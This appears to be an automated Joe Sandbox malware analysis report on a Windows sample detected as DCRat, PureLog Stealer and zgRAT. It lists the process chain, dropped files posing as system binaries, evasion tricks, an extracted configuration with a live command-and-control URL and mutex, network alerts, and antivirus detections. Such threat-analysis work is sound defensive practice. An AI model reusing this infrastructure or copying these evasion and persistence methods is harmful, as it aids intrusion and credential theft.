Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Qsi7IgkrWa.exe

Overview

General Information

Sample name:Qsi7IgkrWa.exe
renamed because original name is a hash value
Original sample name:6296cf36bbbbe91b8ff186d18a08afa3.exe
Analysis ID:1569639
MD5:6296cf36bbbbe91b8ff186d18a08afa3
SHA1:3c71d4099d817731504433785dd2166f81d8ef15
SHA256:5e0bd8298a3193c217f563a32aae650eb29dbb513716c34a4b7698309edd1f70
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Unusual Parent Process For Cmd.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Qsi7IgkrWa.exe (PID: 5216 cmdline: "C:\Users\user\Desktop\Qsi7IgkrWa.exe" MD5: 6296CF36BBBBE91B8FF186D18A08AFA3)
    • wscript.exe (PID: 5288 cmdline: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ComponentBrowserruntimeHostNet.exe (PID: 5296 cmdline: "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
          • cmd.exe (PID: 1260 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 4996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7004 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • lsass.exe (PID: 1368 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
              • cmd.exe (PID: 2596 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • chcp.com (PID: 1360 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • PING.EXE (PID: 1148 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                • lsass.exe (PID: 3412 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                  • cmd.exe (PID: 2724 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • chcp.com (PID: 1908 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                    • w32tm.exe (PID: 6836 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                    • lsass.exe (PID: 5804 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                      • cmd.exe (PID: 824 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • chcp.com (PID: 6568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                        • PING.EXE (PID: 6916 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                        • lsass.exe (PID: 1432 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                          • cmd.exe (PID: 2144 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                            • conhost.exe (PID: 5236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                            • chcp.com (PID: 4088 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                            • PING.EXE (PID: 4520 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                            • lsass.exe (PID: 3896 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                              • cmd.exe (PID: 2212 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                • chcp.com (PID: 2080 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                • w32tm.exe (PID: 5228 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                • lsass.exe (PID: 5144 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                                  • cmd.exe (PID: 2848 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                    • conhost.exe (PID: 1640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                    • chcp.com (PID: 2176 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                    • w32tm.exe (PID: 5368 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                    • lsass.exe (PID: 3964 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                                      • cmd.exe (PID: 4136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                        • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                        • chcp.com (PID: 3236 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                        • w32tm.exe (PID: 6160 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                        • lsass.exe (PID: 4128 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                                          • cmd.exe (PID: 7000 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                            • chcp.com (PID: 6256 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                            • w32tm.exe (PID: 2520 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                            • lsass.exe (PID: 5652 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                                              • cmd.exe (PID: 980 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                • chcp.com (PID: 1228 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                                • PING.EXE (PID: 2564 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                                • lsass.exe (PID: 3068 cmdline: "C:\Recovery\lsass.exe" MD5: BD5DF5DC5869453A2501A80C6FC937F4)
                                                  • cmd.exe (PID: 6328 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                    • conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                    • chcp.com (PID: 6500 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                                    • PING.EXE (PID: 6436 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp", "MUTEX": "DCR_MUTEX-bYSevfnxifF6AWqcLL5C", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
Qsi7IgkrWa.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Qsi7IgkrWa.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\HypercontainerServerhostDll\TextInputHost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: ComponentBrowserruntimeHostNet.exe PID: 5296JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 1 entries
                          SourceRuleDescriptionAuthorStrings
                          4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.Qsi7IgkrWa.exe.6a42121.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, ProcessId: 5296, TargetFilename: C:\Recovery\lsass.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Recovery\lsass.exe" , CommandLine: "C:\Recovery\lsass.exe" , CommandLine|base64offset|contains: , Image: C:\Recovery\lsass.exe, NewProcessName: C:\Recovery\lsass.exe, OriginalFileName: C:\Recovery\lsass.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1260, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Recovery\lsass.exe" , ProcessId: 1368, ProcessName: lsass.exe
                                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Recovery\lsass.exe, ProcessId: 1368, TargetFilename: C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat
                                    Source: Process startedAuthor: Tim Rauch: Data: Command: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" , CommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Recovery\lsass.exe" , ParentImage: C:\Recovery\lsass.exe, ParentProcessId: 1368, ParentProcessName: lsass.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" , ProcessId: 2596, ProcessName: cmd.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Qsi7IgkrWa.exe", ParentImage: C:\Users\user\Desktop\Qsi7IgkrWa.exe, ParentProcessId: 5216, ParentProcessName: Qsi7IgkrWa.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe" , ProcessId: 5288, ProcessName: wscript.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-06T01:42:17.898445+010020480951A Network Trojan was detected192.168.2.44973437.44.238.25080TCP
                                    2024-12-06T01:42:31.195384+010020480951A Network Trojan was detected192.168.2.44973737.44.238.25080TCP
                                    2024-12-06T01:42:39.992268+010020480951A Network Trojan was detected192.168.2.44973837.44.238.25080TCP
                                    2024-12-06T01:42:53.226683+010020480951A Network Trojan was detected192.168.2.44973937.44.238.25080TCP
                                    2024-12-06T01:43:06.601728+010020480951A Network Trojan was detected192.168.2.44976237.44.238.25080TCP
                                    2024-12-06T01:43:15.086183+010020480951A Network Trojan was detected192.168.2.44978137.44.238.25080TCP
                                    2024-12-06T01:43:23.586177+010020480951A Network Trojan was detected192.168.2.44980137.44.238.25080TCP
                                    2024-12-06T01:43:32.804998+010020480951A Network Trojan was detected192.168.2.44982337.44.238.25080TCP
                                    2024-12-06T01:43:41.383131+010020480951A Network Trojan was detected192.168.2.44984437.44.238.25080TCP
                                    2024-12-06T01:43:54.133125+010020480951A Network Trojan was detected192.168.2.44987237.44.238.25080TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: Qsi7IgkrWa.exeAvira: detected
                                    Source: http://595506cm.n9shka.top/Avira URL Cloud: Label: malware
                                    Source: http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.phpAvira URL Cloud: Label: malware
                                    Source: http://595506cm.n9shka.topAvira URL Cloud: Label: malware
                                    Source: C:\Users\user\AppData\Local\Temp\2juDPxCKYX.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\nhkbaghNki.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeAvira: detection malicious, Label: TR/Spy.Agent.qwlok
                                    Source: C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\Desktop\CmKYhHkf.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeAvira: detection malicious, Label: TR/Spy.Agent.qwlok
                                    Source: C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\Desktop\CKyWUHyH.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\AppData\Local\Temp\TqMgut2j0M.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\HypercontainerServerhostDll\TextInputHost.exeAvira: detection malicious, Label: TR/Spy.Agent.qwlok
                                    Source: C:\Users\user\Desktop\AFUvvHdz.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\AppData\Local\Temp\2JnastWSjL.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\Desktop\GQmWAABO.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Local\Temp\jUHUXwf87c.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Recovery\lsass.exeAvira: detection malicious, Label: TR/Spy.Agent.qwlok
                                    Source: C:\Users\user\AppData\Local\Temp\riciCmDgnt.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeAvira: detection malicious, Label: TR/Spy.Agent.qwlok
                                    Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeAvira: detection malicious, Label: TR/Spy.Agent.qwlok
                                    Source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp", "MUTEX": "DCR_MUTEX-bYSevfnxifF6AWqcLL5C", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: 595506cm.n9shka.topVirustotal: Detection: 14%Perma Link
                                    Source: http://595506cm.n9shka.top/Virustotal: Detection: 14%Perma Link
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeReversingLabs: Detection: 83%
                                    Source: C:\HypercontainerServerhostDll\TextInputHost.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeReversingLabs: Detection: 83%
                                    Source: C:\Recovery\lsass.exeReversingLabs: Detection: 83%
                                    Source: C:\Users\user\Desktop\AFUvvHdz.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\AsWoiMty.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\CKyWUHyH.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\CYkgyfvY.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\CmKYhHkf.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\FrxXNAmm.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\GQmWAABO.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\LkfFbrxk.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\MtSmEjDp.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\QrHcjUSw.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\RIKTmlsJ.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\TBLKldEI.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\UKBLugCN.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\XVlEhDHN.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\XmyUnkUi.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\YBBlCWWw.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\ZPkAsstD.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\brdjWOxr.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\dhGiqFYl.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\gVSkXNZP.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\gtMhCYIK.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\heJamQmd.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\iAcIGVjp.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\icHKrlAV.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\kwMHLMmE.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\nPayaidT.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\oZQzjlbX.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\phNJAZcc.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\qjmAjDHY.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\reDyPeef.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\tIBixNUy.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\vXhOtgDl.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\whSGRYvh.logReversingLabs: Detection: 50%
                                    Source: Qsi7IgkrWa.exeReversingLabs: Detection: 71%
                                    Source: Qsi7IgkrWa.exeVirustotal: Detection: 59%Perma Link
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                                    Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\CmKYhHkf.logJoe Sandbox ML: detected
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeJoe Sandbox ML: detected
                                    Source: C:\HypercontainerServerhostDll\TextInputHost.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\HInMzsNO.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\AFUvvHdz.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JeCeCscc.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\GQmWAABO.logJoe Sandbox ML: detected
                                    Source: C:\Recovery\lsass.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\EaXPTOzT.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJoe Sandbox ML: detected
                                    Source: Qsi7IgkrWa.exeJoe Sandbox ML: detected
                                    Source: Qsi7IgkrWa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Windows Portable Devices\6e82e733a89f1eJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\6e82e733a89f1eJump to behavior
                                    Source: Qsi7IgkrWa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Qsi7IgkrWa.exe
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BBA69B
